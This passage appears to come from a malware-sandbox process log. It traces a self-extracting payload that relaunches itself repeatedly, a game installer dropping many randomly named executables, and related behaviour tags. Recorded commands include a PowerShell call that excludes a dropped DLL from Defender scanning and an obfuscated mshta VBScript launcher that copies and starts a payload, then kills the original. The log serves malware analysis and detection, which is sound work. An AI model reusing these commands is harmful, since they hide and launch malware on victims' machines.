C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
280⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:6048

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
281⤵
PID:9760

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
282⤵
PID:6372

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
283⤵
PID:9636

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
284⤵
PID:6404

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
285⤵
PID:8744

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
286⤵
PID:5520

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
287⤵
PID:8728

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
288⤵
PID:5968

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
289⤵
PID:5212

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
290⤵
PID:9168

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
291⤵
PID:9152

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
292⤵
- Executes dropped EXE
PID:5884

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
293⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
294⤵
PID:7856

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
295⤵
PID:10008

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
296⤵
PID:660

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
297⤵
PID:2796

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
298⤵
PID:8220

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
299⤵
PID:4712

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
300⤵
PID:8004

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
301⤵
PID:4940

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
302⤵
PID:900

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
303⤵
PID:300

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
304⤵
PID:7820

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
305⤵
PID:2224

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
306⤵
PID:8984

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
307⤵
PID:9440

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
308⤵
PID:6200

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
309⤵
PID:5936

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
310⤵
PID:10180

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
311⤵
PID:6228

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
312⤵
PID:9712

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
313⤵
PID:8096

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
314⤵
PID:3312

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
315⤵
PID:9036

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
316⤵
PID:5088

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
317⤵
PID:8504

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
318⤵
PID:5124

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
319⤵
PID:9368

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
320⤵
PID:4340

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
321⤵
PID:7872

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
322⤵
PID:9360

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
323⤵
PID:7980

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
324⤵
PID:6496

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
325⤵
PID:8792

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
326⤵
PID:6424

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
327⤵
PID:7584

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
328⤵
PID:7068

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
329⤵
PID:7940

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
330⤵
PID:4608

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
331⤵
PID:9600

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
332⤵
PID:4396

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
333⤵
PID:8920

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
334⤵
PID:3860

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
335⤵
PID:1304

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
336⤵
PID:4832

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
337⤵
PID:1220

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
338⤵
PID:2764

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
339⤵
PID:9072

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
340⤵
PID:6124

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
341⤵
PID:936

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
342⤵
PID:5044

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
343⤵
PID:6352

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
344⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
345⤵
PID:10220

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
346⤵
PID:192

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
347⤵
PID:8736

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
348⤵
PID:5124

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
349⤵
PID:6012

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
350⤵
PID:6916

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
351⤵
PID:6068

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
352⤵
PID:9360

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
353⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
354⤵
PID:4588

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
355⤵
PID:8176

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
356⤵
PID:8660

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
357⤵
PID:8940

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
358⤵
PID:5212

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
359⤵
PID:3996

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
360⤵
PID:7760

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
361⤵
PID:9220

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
362⤵
PID:9328

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
363⤵
PID:9596

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
364⤵
PID:7380

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
365⤵
PID:904

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
366⤵
PID:5520

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
367⤵
PID:3700

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
368⤵
PID:2980

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
369⤵
PID:8776

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
370⤵
PID:7172

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
371⤵
PID:7860

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
372⤵
PID:10052

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
373⤵
PID:3608

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
374⤵
PID:6780

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
375⤵
PID:8136

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
376⤵
PID:6228

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
377⤵
PID:10220

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
378⤵
PID:8288

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
379⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
380⤵
PID:5088

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
381⤵
PID:4712

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
382⤵
PID:8932

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
383⤵
PID:8108

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
384⤵
PID:4336

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
385⤵
PID:7252

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
386⤵
PID:776

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
387⤵
PID:2224

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
388⤵
PID:9368

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
389⤵
PID:7832

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
390⤵
PID:7152

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
391⤵
PID:388

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
392⤵
PID:6372

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
393⤵
PID:8760

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
394⤵
PID:9256

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
395⤵
PID:5712

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
396⤵
PID:2920

C:\Windows\SysWOW64\PING.EXE
ping RJMQBVDN -n 30
7⤵
- Runs ping.exe
PID:7364

C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
3⤵
- Executes dropped EXE
PID:4432

C:\Users\Admin\Documents\GvYzYWtPjTPXjQ6NYEsPgD4f.exe
"C:\Users\Admin\Documents\GvYzYWtPjTPXjQ6NYEsPgD4f.exe"
4⤵
PID:7164

C:\Users\Admin\Documents\S3am9aKvvtWFR77GQ1nPJOqF.exe
"C:\Users\Admin\Documents\S3am9aKvvtWFR77GQ1nPJOqF.exe"
4⤵
PID:6080

C:\Users\Admin\Documents\HSgpeehVXIXxJbPnd5SzoFKm.exe
"C:\Users\Admin\Documents\HSgpeehVXIXxJbPnd5SzoFKm.exe"
4⤵
PID:6176

C:\Users\Admin\Documents\HSgpeehVXIXxJbPnd5SzoFKm.exe
C:\Users\Admin\Documents\HSgpeehVXIXxJbPnd5SzoFKm.exe
5⤵
PID:7552

C:\Users\Admin\Documents\Ih87BxH4jRYzC1KNqRtebE_F.exe
"C:\Users\Admin\Documents\Ih87BxH4jRYzC1KNqRtebE_F.exe"
4⤵
PID:6320

C:\Users\Admin\Documents\Ih87BxH4jRYzC1KNqRtebE_F.exe
"C:\Users\Admin\Documents\Ih87BxH4jRYzC1KNqRtebE_F.exe"
5⤵
PID:7984

C:\Users\Admin\Documents\p7B3evIlBYCjbT4BQy7_UfrB.exe
"C:\Users\Admin\Documents\p7B3evIlBYCjbT4BQy7_UfrB.exe"
4⤵
PID:3936

C:\Users\Admin\Documents\p7B3evIlBYCjbT4BQy7_UfrB.exe
"C:\Users\Admin\Documents\p7B3evIlBYCjbT4BQy7_UfrB.exe"
5⤵
PID:2272

C:\Users\Admin\Documents\vW5WzNykpMAMJKTcnTCLQ4br.exe
"C:\Users\Admin\Documents\vW5WzNykpMAMJKTcnTCLQ4br.exe"
4⤵
PID:2752

C:\Users\Admin\Documents\S7sjDsKVhWSJonvq8Cju6ItO.exe
"C:\Users\Admin\Documents\S7sjDsKVhWSJonvq8Cju6ItO.exe"
4⤵
PID:6580

C:\Users\Admin\Documents\JblAr9WwQ5B0iczsCrOq4TAz.exe
"C:\Users\Admin\Documents\JblAr9WwQ5B0iczsCrOq4TAz.exe"
4⤵
PID:6924

C:\Users\Admin\Documents\0gO6sZnBKERlgP3ek1YAT7VG.exe
"C:\Users\Admin\Documents\0gO6sZnBKERlgP3ek1YAT7VG.exe"
4⤵
PID:6576

C:\Users\Admin\Documents\0gO6sZnBKERlgP3ek1YAT7VG.exe
"C:\Users\Admin\Documents\0gO6sZnBKERlgP3ek1YAT7VG.exe" -q
5⤵
PID:4008

C:\Users\Admin\Documents\eTAuEb4oya06vxJ793JUQkse.exe
"C:\Users\Admin\Documents\eTAuEb4oya06vxJ793JUQkse.exe"
4⤵
- Executes dropped EXE
PID:6128

C:\Users\Admin\AppData\Roaming\2947417.exe
"C:\Users\Admin\AppData\Roaming\2947417.exe"
5⤵
PID:2184

C:\Users\Admin\AppData\Roaming\6742225.exe
"C:\Users\Admin\AppData\Roaming\6742225.exe"
5⤵
PID:4256

C:\Users\Admin\AppData\Roaming\7327130.exe
"C:\Users\Admin\AppData\Roaming\7327130.exe"
5⤵
PID:7664

C:\Users\Admin\AppData\Roaming\4343327.exe
"C:\Users\Admin\AppData\Roaming\4343327.exe"
5⤵
PID:7688

C:\Users\Admin\Documents\Vu96RiZr1_n7mzqbHYMLnhR6.exe
"C:\Users\Admin\Documents\Vu96RiZr1_n7mzqbHYMLnhR6.exe"
4⤵
PID:6280

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\VU96RI~1.DLL,s C:\Users\Admin\DOCUME~1\VU96RI~1.EXE
5⤵
PID:6192

C:\Windows\SysWOW64\RUNDLL32.EXE
C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\VU96RI~1.DLL,NhQi
6⤵
PID:8368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\VU96RI~1.DLL
7⤵
PID:10136

C:\Users\Admin\Documents\roQBIWPA63YGugB0c2T_AYjo.exe
"C:\Users\Admin\Documents\roQBIWPA63YGugB0c2T_AYjo.exe"
4⤵
PID:5336

C:\Users\Admin\Documents\AidOpOBVEoUDw1YfiNNChe4c.exe
"C:\Users\Admin\Documents\AidOpOBVEoUDw1YfiNNChe4c.exe"
4⤵
PID:6232

C:\Users\Admin\Documents\AidOpOBVEoUDw1YfiNNChe4c.exe
"C:\Users\Admin\Documents\AidOpOBVEoUDw1YfiNNChe4c.exe"
5⤵
PID:6224

C:\Users\Admin\Documents\5sY3cwMubjG2EQNy0ffmxxaX.exe
"C:\Users\Admin\Documents\5sY3cwMubjG2EQNy0ffmxxaX.exe"
4⤵
PID:6208

C:\Users\Admin\Documents\rCbCiUdQSdSKQbtldclFAOsT.exe
"C:\Users\Admin\Documents\rCbCiUdQSdSKQbtldclFAOsT.exe"
4⤵
- Executes dropped EXE
PID:6076

C:\Users\Admin\Documents\g9rEmK6TqkjO1LSa1wcnMMwU.exe
"C:\Users\Admin\Documents\g9rEmK6TqkjO1LSa1wcnMMwU.exe"
4⤵
PID:6760

C:\Users\Admin\Documents\yL6RdGth62l3NKBCernNS_er.exe
"C:\Users\Admin\Documents\yL6RdGth62l3NKBCernNS_er.exe"
4⤵
PID:4484

C:\Users\Admin\Documents\us35PEp46OMiEjuGEK6ErTRU.exe
"C:\Users\Admin\Documents\us35PEp46OMiEjuGEK6ErTRU.exe"
4⤵
PID:7016

C:\Users\Admin\Documents\fiJvIQnCds1ra24GsTG5bHbD.exe
"C:\Users\Admin\Documents\fiJvIQnCds1ra24GsTG5bHbD.exe"
4⤵
PID:7144

C:\Users\Admin\Documents\OoScmPnqaSJ4nQu3EkimNnhV.exe
"C:\Users\Admin\Documents\OoScmPnqaSJ4nQu3EkimNnhV.exe"
4⤵
PID:6864

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\OoScmPnqaSJ4nQu3EkimNnhV.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\OoScmPnqaSJ4nQu3EkimNnhV.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
5⤵
PID:6728

C:\Windows\SysWOW64\cmd.exe
